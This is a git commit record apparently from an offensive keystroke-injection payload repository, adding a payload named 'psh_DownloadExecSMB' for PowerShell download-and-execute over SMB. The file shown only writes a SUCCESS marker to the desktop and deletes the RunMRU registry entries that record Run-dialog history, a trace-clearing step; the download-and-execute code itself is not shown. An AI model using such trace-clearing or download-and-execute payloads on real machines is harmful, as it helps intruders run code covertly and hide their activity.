Added psh_DownloadExecSMB payload (#172)

* Powershell SMB Delivery

* fixed smbserver.py call
This commit is contained in:
hink
2017-04-16 19:19:49 -05:00
committed by Sebastian Kinne
parent e06b42b328
commit ca5d404dbe
3 changed files with 114 additions and 0 deletions

View File

@@ -0,0 +1,2 @@
New-Item $ENV:UserProfile\Desktop\SUCCESS -ItemType file
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue